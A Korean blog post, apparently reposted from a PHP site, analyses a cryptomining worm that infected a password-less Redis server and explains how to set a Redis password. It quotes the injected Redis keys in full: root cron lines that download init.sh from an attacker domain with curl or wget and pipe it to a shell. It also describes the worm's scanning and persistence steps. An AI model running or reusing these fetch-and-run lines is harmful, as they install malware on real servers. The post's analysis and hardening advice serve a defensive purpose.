인트라넷 환경에서는 비밀번호를 설정하지 않으셔도 되지만, 개인서버와 온라인 공개서버에서는 비밀번호를 설정하셔야 합니다.
어제 redis에서 minio의 이벤트 알림을 확인해보니 redis의 키를 살펴보니 특이한 키가 여러 개 발견되었습니다. 백업1, 백업2, 백업3. 그러다가 채굴 바이러스인 줄 알았어요.
아래와 같이: 이런 식으로 예약된 작업과 스크립트가 우리 컴퓨터에 주입되고 init.sh 스크립트가 실행되기 시작합니다
backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n" backup2 "\n\n\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n" backup3 "\n\n\n*/4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n" backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
en2an.top/cleanfda/in…
이 키의 값을 확인하고 주소를 요청한다는 것을 알 수 있으며 이 init.sh가 무엇인지 살펴보겠습니다.
아래와 같이 스크립트 파일입니다.
이를 위한 스크립트가 꽤 많이 있습니다. selinux를 끄고, 다른 사람의 채굴 프로세스를 종료하고, CPU를 너무 많이 차지하는 프로세스를 종료하는 경우에는 건너뛰고, 시스템을 파괴하도록 명령을 수정하세요. () 기능을 생성하고, 잠금 시간 작업을 잠금 해제 및 추가하고, 채굴 기술 작업을 추가하고, SSH 비밀번호 없는 로그인을 설정하고, 채굴기 채굴 프로그램을 다운로드 및 실행하고, 방화벽을 끄고, 로그를 지우고, 알려진 감염을 수행할 수 있습니다. 비밀번호가 없는 머신에서는 is.sh 를 다운로드하고 실행하세요.
en2an.top/cleanfda/is…
아래 그림과 같이 위의 init.sh는 is.sh 스크립트를 다운로드합니다.
이 스크립트의 기능을 살펴보겠습니다.
아래 그림과 같이 이 스크립트에는 내용이 꽤 많습니다. Masscan 스캐너를 다운로드하고 pnscan 스캐너를 다운로드한 후 redis를 설치하여 Redis 무단 접근 취약점을 생성하고 rs.sh를 실행합니다.
en2an.top/cleanfda/rs…
본 스크립트의 내용은 위 링크를 통해 확인하실 수 있습니다.
포트 6379를 열고 자동으로 redis를 사용하여 승인 없이 예약된 작업을 작성하고 pnscan을 사용하여 세그먼트 b의 IP 6379 포트를 스캔하고 Masscan을 사용하여 포트를 스캔합니다.
위의 분석을 통해 바이러스는 본질적으로 Redis를 통해 마이닝 스크립트를 주입하여 작동한다는 결론을 내릴 수 있습니다. Redis에 비밀번호가 설정되어 있지 않고 공용 인터넷에 노출되어 있는 경우 주의하세요.
다음 두 가지 방법으로 Redis의 비밀번호를 설정할 수 있습니다.
이 방법은 구성 파일을 수정하므로 적용하려면 Redis를 다시 시작해야 한다는 점에 유의해야 합니다.
redis.conf 파일을 찾으세요.
Windows는 아래 그림과 같습니다
이 파일을 편집하고 requirepass를 찾아서 주석을 해제하고 지정된 값을 설정한 후 Redis를 다시 시작하면 적용됩니다.
설치 방법은 사람마다 다를 수 있으므로 docker를 통해 설치하고 매핑해봤습니다. 여기서는 설명하지 않겠습니다. Linux에 설치된 redis 디렉토리를 찾아 redis.conf 구성 파일을 찾으세요. 구성 후 다시 시작하면 됩니다.
저희 Redis에 접속한 후, 안내에 따라 비밀번호를 설정해주세요.
이 방법은 비교적 간단하며 적용하기 위해 다시 시작할 필요가 없습니다.
다음 명령은 비밀번호를 123456으로 설정하라는 의미입니다. 공용 네트워크에서는 그렇게 간단하면 안 됩니다.
config set requirepass 123456
redis 비밀번호를 확인해 보겠습니다.
config get requirepass
이렇게 하면 비밀번호가 성공적으로 설정되었으며 Redis 클라이언트를 종료하고 다시 연결하면 비밀번호가 적용됩니다.
위 내용은 Redis가 비밀번호를 설정해야 하는 이유는 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!